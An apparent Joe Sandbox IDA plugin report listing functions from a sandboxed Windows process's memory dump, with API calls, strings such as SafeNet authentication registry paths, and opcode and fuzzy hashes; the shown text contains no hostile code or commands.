Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: AppendPath$CloseOpenQueryValue
String ID: Path$RegOpenKeyEx(HKEY_LOCAL_MACHINE\SOFTWARE\SAFENET\AUTHENTICATION) error$RegQueryValueExW(Path) error$SAC$SOFTWARE\SAFENET\AUTHENTICATION$Tool_windows$authneticatioinPath$generalSACPath$getSacInstallPath$platformSACPath$x64
API String ID: 3824504360-1140332700
Opcode ID: b6fdec52f01d1bb1e23d54208692b79eef4be6aadd7892ac26bd90d2947bafbe
Instruction ID: fc94e459726212f523e0e6cfd4385276d705567f09f18ccbd49f0501d27c2fdc
Opcode Fuzzy Hash: b6fdec52f01d1bb1e23d54208692b79eef4be6aadd7892ac26bd90d2947bafbe
Instruction Fuzzy Hash: 95417F64B18F4290FB21BB36E4D02B9A761AF89BC4FC04031E94E4BB56EFADD1458730

Function 00007FF79EE613F4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32 ref: 00007FF79EE6142E
GetProcAddress.KERNEL32 ref: 00007FF79EE614A9
GetProcAddress.KERNEL32 ref: 00007FF79EE614BC
etPropWriteInt.ETOKEN ref: 00007FF79EE6150E
ExitProcess.KERNEL32 ref: 00007FF79EE6151F
ExitProcess.KERNEL32 ref: 00007FF79EE6152B
ExitProcess.KERNEL32 ref: 00007FF79EE61537

Strings

CoreInstallReaders, xrefs: 00007FF79EE6149F
eTCoreInst, xrefs: 00007FF79EE61484
SoftwareSlots, xrefs: 00007FF79EE61507
MAGIC, xrefs: 00007FF79EE61445
CoreRemoveReaders, xrefs: 00007FF79EE614AF

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ExitProcess$AddressProc$ArgvCommandLinePropWrite
String ID: CoreInstallReaders$CoreRemoveReaders$MAGIC$SoftwareSlots$eTCoreInst
API String ID: 3880261357-3162536127
Opcode ID: a74338d4535f92b792498d69cd7dfe758f0d85a20d9546f9bc9cb5063825d6e7
Instruction ID: 6b67c7aa2ae34f0b17ea841518891ef1f69f56de97246870e4514e4f0649c5ac
Opcode Fuzzy Hash: a74338d4535f92b792498d69cd7dfe758f0d85a20d9546f9bc9cb5063825d6e7
Instruction Fuzzy Hash: 20313B22B19F5292FB31BB75A8D457CA2A1BF98B84F850534C90E47755EFBDE8058330

Function 00007FF79EE6BB80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF79EE6BD64,?,?,00000000,00007FF79EE6990B,?,?,?,00007FF79EE673F1), ref: 00007FF79EE6BCFC
GetProcAddress.KERNEL32(?,?,?,00007FF79EE6BD64,?,?,00000000,00007FF79EE6990B,?,?,?,00007FF79EE673F1), ref: 00007FF79EE6BD08

Strings

ext-ms-, xrefs: 00007FF79EE6BC59
api-ms-, xrefs: 00007FF79EE6BC46

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 56895c025ccec27426eceb3fc4d7faf0c8daf2e1b17759f419e9b6412f2c7b22
Instruction ID: e876e6ee6f177ab4c4555710bfa89cc616569545e85d307ab5c50cdae4221653
Opcode Fuzzy Hash: 56895c025ccec27426eceb3fc4d7faf0c8daf2e1b17759f419e9b6412f2c7b22
Instruction Fuzzy Hash: F8410325B19E1281FB35EB36A8905B5A291BF45FA0F890535CD1E8B788EFBCE5458330

Function 00007FF79EE61688 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 23stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF79EE6169C
PathStripPathA.SHLWAPI ref: 00007FF79EE616A5
PathFindExtensionA.SHLWAPI ref: 00007FF79EE616AE
lstrcmpiA.KERNEL32 ref: 00007FF79EE616C3
PathRemoveExtensionA.SHLWAPI ref: 00007FF79EE616D0

Strings

.exe, xrefs: 00007FF79EE616B9
logonui, xrefs: 00007FF79EE61688

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Path$Extension$FileFindModuleNameRemoveStriplstrcmpi
String ID: .exe$logonui
API String ID: 4196267173-4237098155
Opcode ID: 629b72c0ce298ea06e4756fdd405dfc7df23ee51033e3bc8700492dfd4fc803e
Instruction ID: b88eacfd9c1c406e053fbe7998df637ae184eacd3878c5fa87488547dcaebb9e
Opcode Fuzzy Hash: 629b72c0ce298ea06e4756fdd405dfc7df23ee51033e3bc8700492dfd4fc803e
Instruction Fuzzy Hash: 26E0ED54F09B0792FF28BB727895138A3516F59F81B881034CC0F4A351DEADA4888234

Function 00007FF79EE652A8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 312COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF79EE65304

Part of subcall function 00007FF79EE661E8: __GetUnwindTryBlock.LIBCMT ref: 00007FF79EE6622B
Part of subcall function 00007FF79EE661E8: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF79EE66250

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF79EE653DC
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF79EE6572E

Part of subcall function 00007FF79EE643BC: LdrLoadDll.NTDLL ref: 00007FF79EE643F6

Strings

csm, xrefs: 00007FF79EE6531E
csm, xrefs: 00007FF79EE653FF
csm, xrefs: 00007FF79EE65385

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: BlockUnwind$FrameHandlerHandler3::Is_bad_exception_allowedLoadSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2402549934-393685449
Opcode ID: 7f14de3839a8a1a98ca99c5a576c932e7b38c7735e363dcf4383d1c201a508e4
Instruction ID: 3ce03bb15d96be1b17067371ca45274d2a9e6d3a6f482ff7061721a9140a7e8f
Opcode Fuzzy Hash: 7f14de3839a8a1a98ca99c5a576c932e7b38c7735e363dcf4383d1c201a508e4
Instruction Fuzzy Hash: 58D19032A08B428AFB30AF75D4842ADB7A0FB55B98F900535DE8D57B55CFB8E094C720

Function 00007FF79EE6926C Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF79EE6927B
FlsGetValue.KERNEL32 ref: 00007FF79EE69290
FlsSetValue.KERNEL32 ref: 00007FF79EE692B1
FlsSetValue.KERNEL32 ref: 00007FF79EE692DE
FlsSetValue.KERNEL32 ref: 00007FF79EE692EF
FlsSetValue.KERNEL32 ref: 00007FF79EE69300
SetLastError.KERNEL32 ref: 00007FF79EE6931B

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 36317feccfc3b76afa357e3683969ab6f654b3dd8de5ebe962b9c917ad44eadd
Instruction ID: 3c2fc23aaf8f171114b79c4e4191fc18027ff6b739f2ec2ebae41c9432b38f8b
Opcode Fuzzy Hash: 36317feccfc3b76afa357e3683969ab6f654b3dd8de5ebe962b9c917ad44eadd
Instruction Fuzzy Hash: A5217C20A08E4282FB78B771A9D5179E3925F48FB0F840734D83E4B7DADEAEA4414370

Function 00007FF79EE6F218 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF79EE6F249
GetLastError.KERNEL32 ref: 00007FF79EE6F255
CloseHandle.KERNEL32 ref: 00007FF79EE6F26D
CreateFileW.KERNEL32 ref: 00007FF79EE6F298
WriteConsoleW.KERNEL32 ref: 00007FF79EE6F2B7

Strings

CONOUT$, xrefs: 00007FF79EE6F279

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 416c2b2a0521a7d1c3ca427947a8cf4391c97265ef363bff49f15efaecbf2927
Instruction ID: 8deff179918e424bb122ef38c0d7557f2768a667e445bd7c50fbbcb10f67227f
Opcode Fuzzy Hash: 416c2b2a0521a7d1c3ca427947a8cf4391c97265ef363bff49f15efaecbf2927
Instruction Fuzzy Hash: 3F11B921B18B8186F760AB62E884729F3A4FB88FE4F400234DD5D87798DFBDD8048760

Function 00007FF79EE693E4 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF79EE68E05,?,?,?,?,00007FF79EE69A7F,?,?,00000000,00007FF79EE69502,?,?,?), ref: 00007FF79EE693F3
FlsSetValue.KERNEL32(?,?,?,00007FF79EE68E05,?,?,?,?,00007FF79EE69A7F,?,?,00000000,00007FF79EE69502,?,?,?), ref: 00007FF79EE69429
FlsSetValue.KERNEL32(?,?,?,00007FF79EE68E05,?,?,?,?,00007FF79EE69A7F,?,?,00000000,00007FF79EE69502,?,?,?), ref: 00007FF79EE69456
FlsSetValue.KERNEL32(?,?,?,00007FF79EE68E05,?,?,?,?,00007FF79EE69A7F,?,?,00000000,00007FF79EE69502,?,?,?), ref: 00007FF79EE69467
FlsSetValue.KERNEL32(?,?,?,00007FF79EE68E05,?,?,?,?,00007FF79EE69A7F,?,?,00000000,00007FF79EE69502,?,?,?), ref: 00007FF79EE69478
SetLastError.KERNEL32(?,?,?,00007FF79EE68E05,?,?,?,?,00007FF79EE69A7F,?,?,00000000,00007FF79EE69502,?,?,?), ref: 00007FF79EE69493

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: b9b4e01528619efe32a9c9205cbe967385fbbf3e05cfeae52c0c01d95630ccff
Instruction ID: 70de9f553151f00b942ef2a620cfacf957a5ae01b823d5736bd12570900def6c
Opcode Fuzzy Hash: b9b4e01528619efe32a9c9205cbe967385fbbf3e05cfeae52c0c01d95630ccff
Instruction Fuzzy Hash: E3111D24A08A8242FB74B73195D5179E3956F88BB0FC44734D93E067DADEADA4418770

Function 00007FF79EE6740C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF79EE67431
GetProcAddress.KERNEL32 ref: 00007FF79EE67447
FreeLibrary.KERNEL32 ref: 00007FF79EE6746E

Strings

mscoree.dll, xrefs: 00007FF79EE67428
CorExitProcess, xrefs: 00007FF79EE67440

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 484c6602ddc3ca4301742a5820bfadcd23eb6048118f521682f46139b4188ba5
Instruction ID: 04464671ba5edd077cfc3d7df9243deeee95b6137deb2ca9eef14874e91bb15a
Opcode Fuzzy Hash: 484c6602ddc3ca4301742a5820bfadcd23eb6048118f521682f46139b4188ba5
Instruction Fuzzy Hash: 95F04461A19B4281FB30AB34A4C93399760EF49BA1F940239D56D457E4DFADD489C730

Function 00007FF79EE6F568 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF79EE6F590
_set_statfp.LIBCMT ref: 00007FF79EE6F5AB
_set_statfp.LIBCMT ref: 00007FF79EE6F5C7
_set_statfp.LIBCMT ref: 00007FF79EE6F603

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 1bb473138f9ce87012b926fcc367580a5a9421af8053392c5fe2b4c405943a53
Instruction ID: db7aa058f4bb0ef36fe2d5cf20f45353662ab77eef1563c30baa3f7c76d4252b
Opcode Fuzzy Hash: 1bb473138f9ce87012b926fcc367580a5a9421af8053392c5fe2b4c405943a53
Instruction Fuzzy Hash: 5F118F62E58E0306F6783D38E5E1379B1407F58B78F944634EA6E562DADEACAC41C134

Function 00007FF79EE694AC Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF79EE669BE,?,?,?,00007FF79EE66A07,?,?,00000000,00007FF79EE66D2E), ref: 00007FF79EE694CB
FlsSetValue.KERNEL32(?,?,?,00007FF79EE669BE,?,?,?,00007FF79EE66A07,?,?,00000000,00007FF79EE66D2E), ref: 00007FF79EE694EA
FlsSetValue.KERNEL32(?,?,?,00007FF79EE669BE,?,?,?,00007FF79EE66A07,?,?,00000000,00007FF79EE66D2E), ref: 00007FF79EE69512
FlsSetValue.KERNEL32(?,?,?,00007FF79EE669BE,?,?,?,00007FF79EE66A07,?,?,00000000,00007FF79EE66D2E), ref: 00007FF79EE69523
FlsSetValue.KERNEL32(?,?,?,00007FF79EE669BE,?,?,?,00007FF79EE66A07,?,?,00000000,00007FF79EE66D2E), ref: 00007FF79EE69534

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 3ebb3bf590366f71e5fe5600651d11f4a63920f7e82dfa3554802df8119b393a
Instruction ID: 1ab64b7663bb473f0b424f3402294843cbb844788e6c336cbb16aa68311c0393
Opcode Fuzzy Hash: 3ebb3bf590366f71e5fe5600651d11f4a63920f7e82dfa3554802df8119b393a
Instruction Fuzzy Hash: 09110D20A0CE8242FBB8B735A9D1579A3955F44BB4FD84335E83D0A7DADEADE4418270

Function 00007FF79EE69340 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF79EE69351
FlsSetValue.KERNEL32 ref: 00007FF79EE69370
FlsSetValue.KERNEL32 ref: 00007FF79EE69398
FlsSetValue.KERNEL32 ref: 00007FF79EE693A9
FlsSetValue.KERNEL32 ref: 00007FF79EE693BA

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5e77e136c01eddc08769d0666a21f657701fc2ceb4c93a6a9b83bd7960eb0856
Instruction ID: a371ae71399560945c5f7d2e8ff784a06a9d00348f473830e8fcd84b7a88bcb0
Opcode Fuzzy Hash: 5e77e136c01eddc08769d0666a21f657701fc2ceb4c93a6a9b83bd7960eb0856
Instruction Fuzzy Hash: 1C11FA14E48E0742FFB8B23998E15B9A3954F84B74FD80734D93E0A2E6DEEEB4455270

Function 00007FF79EE6260C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF79EE6261C
FreeLibrary.KERNEL32 ref: 00007FF79EE6262F
SetLastError.KERNEL32 ref: 00007FF79EE6263A

Strings

SAC_VERSION_10_9, xrefs: 00007FF79EE62612

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: SAC_VERSION_10_9
API String ID: 1144718084-3929381416
Opcode ID: 9bb0762321984a575a5d4c5dea854fea2cb0a4afbae2c93dd87749a7c36dcae0
Instruction ID: 32ee9bbefcb834a67cff2e81639e04c203d1ef848b61f04f9537cacd6429e2c6
Opcode Fuzzy Hash: 9bb0762321984a575a5d4c5dea854fea2cb0a4afbae2c93dd87749a7c36dcae0
Instruction Fuzzy Hash: 81E0EC50E19B4681FB746B71789513492609F1CB51F981034C94E49390DEADA4898330

Function 00007FF79EE6D7C4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF79EE6D843
WriteFile.KERNEL32 ref: 00007FF79EE6DB0B
WriteFile.KERNEL32 ref: 00007FF79EE6DB51
GetLastError.KERNEL32 ref: 00007FF79EE6DC07

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: b225ab4701a821b1c564b49655df9a72fefafa3d21660fbee393d9275da52907
Instruction ID: 81ab7811663976f1dcec68e21ec8da167540693c6a0af98cc517a7d48ca2b8f3
Opcode Fuzzy Hash: b225ab4701a821b1c564b49655df9a72fefafa3d21660fbee393d9275da52907
Instruction Fuzzy Hash: 4AD1E132F08A8589F721EF75D4802AC77B2FB44B98B844236DE5D97B99DE78D446C320

Function 00007FF79EE6E0EC Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF79EE6E0D7,00000000), ref: 00007FF79EE6E208
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00007FF79EE6E0D7,00000000), ref: 00007FF79EE6E293

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 0e92f45aab4448b6495972362855788907ec6b3b2145860aafb581eedb7d93f7
Instruction ID: 08544807d225e0ba8ee0e26623545c05aaa1b982a76c03585b527437c003141b
Opcode Fuzzy Hash: 0e92f45aab4448b6495972362855788907ec6b3b2145860aafb581eedb7d93f7
Instruction Fuzzy Hash: 4791C432E08A5185F770AB7594C02BDABA1BB05F88F944139EE0E667E5DEB8D541C330

Function 00007FF79EE65AC8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79EE64364: LdrLoadDll.NTDLL ref: 00007FF79EE643F6

__std_exception_copy.LIBVCRUNTIME ref: 00007FF79EE65D24

Strings

csm, xrefs: 00007FF79EE65C2A
csm, xrefs: 00007FF79EE65B12

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Load__std_exception_copy
String ID: csm$csm
API String ID: 1200525721-3733052814
Opcode ID: 27844c416a907c529b15ba961238b4db965915ff5fb63413ea0df207f4fd3649
Instruction ID: 2a514a7d14592f298cfde6cd23202ed64d56fdf9d72e6427a650b8dbdaa428e6
Opcode Fuzzy Hash: 27844c416a907c529b15ba961238b4db965915ff5fb63413ea0df207f4fd3649
Instruction Fuzzy Hash: 82618E32A08B4286FB34AF319488278B6A0FB54F84F945535DA4D477D5DFBCE494C720

Function 00007FF79EE65770 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79EE643BC: LdrLoadDll.NTDLL ref: 00007FF79EE643F6

EncodePointer.KERNEL32 ref: 00007FF79EE657BC

Strings

RCC, xrefs: 00007FF79EE657D9
MOC, xrefs: 00007FF79EE657D0

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: EncodeLoadPointer
String ID: MOC$RCC
API String ID: 229104965-2084237596
Opcode ID: ad012835fcc63b1d05886c9aa70ffa33e9dd6ded90a232ed8da2d18a4195175d
Instruction ID: 6bb785d34eeeccf3d25732706eff4beba8283de6a126b5740190fe1cf4aee456
Opcode Fuzzy Hash: ad012835fcc63b1d05886c9aa70ffa33e9dd6ded90a232ed8da2d18a4195175d
